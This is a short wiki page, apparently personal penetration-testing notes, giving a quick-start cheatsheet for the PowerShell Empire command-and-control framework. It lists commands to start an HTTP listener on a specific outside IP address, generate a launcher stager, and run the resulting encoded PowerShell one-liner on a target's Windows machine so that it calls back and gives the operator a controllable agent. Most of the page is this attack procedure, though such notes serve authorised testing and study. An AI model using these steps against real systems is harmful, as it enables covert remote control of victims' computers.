Skip to content

Powershell Empire Quick Start Cheatsheet

TheGetch edited this page May 14, 2021 · 2 revisions

Powershell Empire Quick Start Cheatsheet

Empire setup:

uselistener http
set Port 9000
set BindIP 0.0.0.0
set Host http://66.35.63.203:9000 (skippy)
execute

back

usestager multi/launcher
set Listener http
execute

Prints something like this: powershell -noP -sta -w 1 -enc SQB<snip>AWAA=

  • You run this in the targets Windows' Powershell

agents (lists agents)


#powershell

_Sidebar

1. Recon

Ping Sweep

CIDR to IP

2. Enumeration

Services

05. HTTP (80,443,8080,8443,etc.)

3. Exploitation

4. Post Exploiation

5. High Value Information

Hashes

6. Reporting

7. Random Notes/Useful Tidbits

Clone this wiki locally